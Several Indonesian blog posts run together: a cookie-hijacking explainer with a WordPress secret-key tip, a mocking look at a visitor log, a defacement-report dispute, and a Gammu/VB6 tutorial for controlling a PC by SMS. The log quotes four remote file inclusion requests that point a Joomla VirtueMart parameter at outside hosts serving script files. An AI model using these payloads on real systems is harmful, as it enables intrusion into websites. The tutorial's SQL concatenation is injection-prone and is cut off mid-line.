Cookie adalah serangkaian teks yang disimpan pada komputer Anda oleh situs web yang Anda kunjungi. Pada umumnya cookie menyimpan pengaturan atau preferensi Anda untuk suatu situs web tertentu, misalnya bahasa yang dipilih, atau lokasi (negara) Anda. Ketika Anda kembali ke situs web tersebut, Browser akan mengirimkan cookie yang bersesuaian kepada situs web yang bersangkutan. Dengan cara ini, situs dapat menampilkan informasi yang sesuai dengan pengaturan atau preferensi Anda.
Cookie dapat menyimpan berbagai jenis informasi, termasuk di antaranya informasi pribadi seperti nama, alamat rumah, alamat email, atau nomor telepon Anda. Akan tetapi informasi ini hanya akan disimpan jika Anda pernah memberikan informasi ini kepada situs tersebut. Situs web tidak dapat mengakses informasi yang tidak pernah Anda berikan kepada situs web tersebut, dan situs web juga tidak dapat mengakses berkas lainnya pada komputer Anda. Secara bawaan (default), aktivitas menyimpan dan mengirim cookie tidak pernah terlihat oleh pengguna
Cookie Hijacking adalah satu metoda yang digunakan para hacker untuk melakukan penetrasi dengan cara melakukan pencurian cookie. Berikut penjelasan tentang Cookie Hijacking yang saya ambil dari wikipedia.
During normal operation cookies are sent back and forth between a server (or a group of servers in the same domain) and the computer of the browsing user. Since cookies may contain sensitive information (user name, a token used for authentication, etc.), their values should not be accessible to other computers. Cookie theft is the act of intercepting cookies by an unauthorized party.
Cookies can be stolen via packet sniffing in an attack called session hijacking. Traffic on a network can be intercepted and read by computers on the network other than its sender and its receiver (particularly on unencrypted public Wi-Fi networks). This traffic includes cookies sent on ordinary unencrypted http sessions. Where network traffic is not encrypted, malicious users can therefore read the communications of other users on the network, including their cookies, using programs called packet sniffers.
Mencegah Cookie Hijacking pada Wordpress dapat dilakukan dengan cara yang sangat simple yaitu dengan cara mengenkrip cookie nya. Bagaimana cara mengenkrip cookie pada wordpress? Untuk melakukan nya buka file wp-config.php anda lalu cari beberapa baris ini pada file tersebut
define(’AUTH_KEY’, ‘put your unique phrase here’);
define(’SECURE_AUTH_KEY’, ‘put your unique phrase here’);
define(’LOGGED_IN_KEY’, ‘put your unique phrase here’);
define(’NONCE_KEY’, ‘put your unique phrase here’);
Lalu buka link berikut ini http://api.wordpress.org/secret-key/1.1/ dan kopi isi dari file tersebut yang di generate secara otomatis oleh wordpress, kemudian ganti 4 baris diatas dengan apa yang sudah kita kopi tadi, kemudian save file tersebut.
Dan Gotcha…!!!
Wordpress yang anda miliki telah aman dari Cookie Hijacking. Simple sekali bukan? Trik ini dapat digunakan untuk Wordpress versi 2.6.0 atau versi yang lebih tinggi.
27-01-2010 09:24 am GMT-7 72.233.48.150 United States Plano, TX http://yadoy666.serverisdown.org/category/joomla%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://klammhoster.de/cache/faq??
27-01-2010 10:05 am GMT-7 209.172.33.230 Canada Montreal, CA http://yadoy666.serverisdown.org//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://downloadgogo.com/osCommerce/catalog/images/baner.txt??
27-01-2010 10:08 am GMT-7 77.79.246.80 Poland Jastrzebie Zdroj, PL http://yadoy666.serverisdown.org/category/joomla%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt??
27-01-2010 10:10 am GMT-7 206.225.93.58 United States Overland Park, KS http://yadoy666.serverisdown.org/category//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt??
Hahahaha…
Coba liat baik-baik dan silahkan ngakak sepuas nya bagi yang dah ngerti letak kelucuan dari log tersebut. Hahahahaha..
Hacker… Oh Hacker…
Blog gw make WordPress Mas, ngapain lu make Exploit nya Joomla buat pentest di blog gw ini, dan sejak kapan gw bikin toko online di blog gw…. Hadoooooh… Ada-ada aja ini bang Hacker, bikin ngakak aja pagi-pagi gini… Tiap hari pula dia ngelakuin hal bodoh itu… wkwkwk… Ada-ada aja ^_^
Nih buat yg pengen liad tingkah nya si hacker itu yang kecatet dari tanggal 24 Januari 2010 sampai dengan 2 Februari 2010 Klik Disini
Update…!!!
Dah jelas-jelas disini udah diposting kalo dia itu begok inject wp make exploit joomla, eh dia masih usaha juga, makek exploit yang sama pulak, com_virtuemart juga lagi yang dipakek. Hahahaha… Nampaknya sangat bersemangat sekali hacker ini sampe-sampe dia nggak sadar klo sedang melakukan hal bodoh… Check this one out Click Here
KETIKA MELIHAT DI SEBUAH SITE YANG KATANYA MENAMAKAN DIRIMEREKA ADALAH SECURITY DARI MALINGSIAL MEMUAT 1 BUAH ARTIKEL YANG SANGAT ANEH DIMANA MEMANG BENAR BAHWA MALINGSIAL ITU HANYA N.A.T.O ( No ACTION, Talk ONLY )
Website: Server IS Down
URL: http://news.serverisdown.org/
DISCLAIMER: All the information related to computer crimes (i.e. defacements) contained in security.org.my were either collected online from public sources or directly notified to us. Security.org.my is neither responsible for the reported computer crimes nor it is directly or indirectly involved in them.
Posted by Mel Mudin at 10:32
DAN COMMENT YANG PERTAMA ADALAH
WKAWKAW…PADAN MUKA INDON….. DIA INGAT SERVERISDOWN TU HEBAT SANGAT….FVCK YADOY666!!!
#1 JUDASS on 2010-01-28 12:12
Perhatiin caption di window firefox sama caption di tab firefox nya? Silahkan analisa sendiri yah ^_^
Saking terobsesinya buat bikin down ServerIsDown sampe-sampe segala cara pun di lakukan termasuk bikin-bikin berita HOAX kek begini, sebener nya ada lagi sih cerita tentang kebodohan maling yang coba-coba hack blog gw ini, tapi ntar aja deh gw simpen dulu ceritanya buat next post aja yah.. hahahaha
Pada artikel kali ini saya akan membahas tentang cara mengendalikan komputer dengan menggunakan sms. Untuk melakukan hal tersebut kita membutuhkan sebuah software komputer bernama Gammu dan development tolls yang akan kita gunakan adalah Microsoft Visual Basic. 6.0. Untuk informasi lebih lengkap mengenai gammu dapat dilihat pada link berikut http://www.gammu.org/wiki/index.php
Installing Gammu
Bagi teman-teman yang belum tau apa itu Gammu, saya akan memberikan sedikit gambaran tentang Gammu. Gammu adalah sebuah software yang berguna untuk mengambil sms yang terdapat pada inbox handphone kita dan menyimpannya ke dalam database. Database yang digunakan adalah MySQL. (Untuk saat ini telah banyak database yang disuuport oleh Gammu selain MySQL, untuk info lebih lanjut silahkan kunjungi website resminya). Pada artikel kali ini saya menggunakan Gammu versi lama yaitu versi 1.09.00.
Sebelum kita menginstall Gamu pastikan database MySQL telah terinstall di mesin yang akan digunakan, buat sebuah database dengan nama “smsd” dan kemudian dump file berikut kedalam database MySQL. Yang perlu diperhatikan saat mengintall Gammu adalah dua file konfigurasinya yaitu “gammurc” dan “smsdrc”. Pada file gammurc yang harus kita perhatikan adalah bagian port dan connection. Isi nilai port dengan port yang kita gunakan untuk melakukan koneksi handphone dengan mesin yang digunakan. Untuk connection sesuaikan dengan koneksi yang kita gunakan. Pada percobaan ini saya menggunakan Sony Ericsson W.660i dengan port Com6 dan jenis koneksinya adalah “at”. Untuk mengetahui jenis koneksi yang anda gunakan silahkan klik link berikut http://wammu.eu/phones/ cari jenis handphone yang digunakan dan lihat koneksi yang digunakan.
Setelah port dan jenis koneksi telah kita dapatkan, maka sekarang kita test apakah konfigurasi yang telah kita masukan sudah benar atau belum. Untuk mengetestnya buka command prompt dan masuk ke direktori dimana Gammu kita simpan, dan kemudian ketikan perintah berikut. “gammu –identify” Apabila konfigurasi yang telah kita masukan telah sesuai maka akan tampil imei dari handphone yang kita gunakan.
Setelah handphone kita berhasil di kenali oleh gammu, langkah selanjutnya adalah memasukan konfigurasi untuk file “smsdrc”. Perhatikan pada bagian user, password, pc, dan database. Isi user dengan user yang digunakan untuk login ke database MySQL, isi password dengan password yang digunakan untuk login ke database, isi pc dengan alamat komputer (localhost) dan isi database dengan nama database yang akan kita gunakan, kemudian simpan file tersebut. Lalu saat nya kita melakukan test untuk mengetahui apakah gammu sudah berhasil melakukan koneksi dengan database. Perintah yang kita gunnakan adalah “gammu –smsd MYSQL smsdrc”. Apabila berhasil akan tampil seperti berikut.
Kemudian kita cek ke table Inbox pada database apakah sms-sms yang ada di handphone kita sudah masuk kedalam database, apabila sudah masuk maka pengisntallan telah sukses dilakukan, dan kita bisa ke tahap development untuk membuat sebuah program yang dapat mengedalikan komputer dengan memanfaatkan data-data sms yang telah di masukan oleh gammu kedalam database.
Development
Untuk tahap development ini kita mengguanakan Visual Basic. 6.0. Pada intinya cara kerja program ini adalah membaca sms terakhir yang masuk, dan menterjemahkan sms tersebut untuk menentukan langkah apa yang akan dilakukan si program. Kita juga membutuhkan MySQL Connector untuk melakukan koneksi dari Visual Basic ke MySQL.
Berikut sedikit potongan kode program nya. Mengapa saya hanya berikan potongan kode nya saja? Karna tidak mungkin saya paste disini semua, kalo saya paste semua yang ada penuh dengan code aja nanti isi artikel nya. Pada bagian terakhir saya akan memberikan link untuk mendownload full soruce code nya.
Private Sub TimerSMS_Timer()
On Error GoTo errHDL
Dim sSQL As String
Dim rst As RecordSet
Dim sLastID As String
Dim sCommand As String
Dim sID As String
Dim LRet As Long
ucFirefoxWait.Visible = True
ucFirefoxWait.PlayWait
sLastID = getLastID
Set rst = New RecordSet
sSQL = “SELECT * FROM INBOX WHERE ID =’” & sLastID & “‘ AND PROCESSED=’FALSE’ LIMIT 0,1;”
Nah, dilihat dari kode tersebut diatas sebuah timer akan terus mengecek sms terakhir kedatabase, apabila ada kemudian program tersebut akan membaca isi dari sms tersebut, apabila isi dari sms tersebut sesuai dengan perintah yang ditentukan maka si program akan memproses langkah selanjutnya. Dalam source code yang saya berikan nanti, program tersebut hanya baru bisa memproses bebrapa perintah antara lain ver yang digunakan untuk mengetahui versi program, check inbox untuk mengetahui jumlah sms yang terdapat dalam table inbox, about untuk mengetahui tentang program, tutupcdrom untuk menutup cd rom, bukacdrom perintah untuk membuka cd rom, turnoff untuk mematikan komputer. Teman-teman dapat menambahkan perintah-perintah lain sesuai dengan yang dikehendaki.
DESTINATIONNUMBER, CODING, TEXTDECODED) VALUES (‘” & _
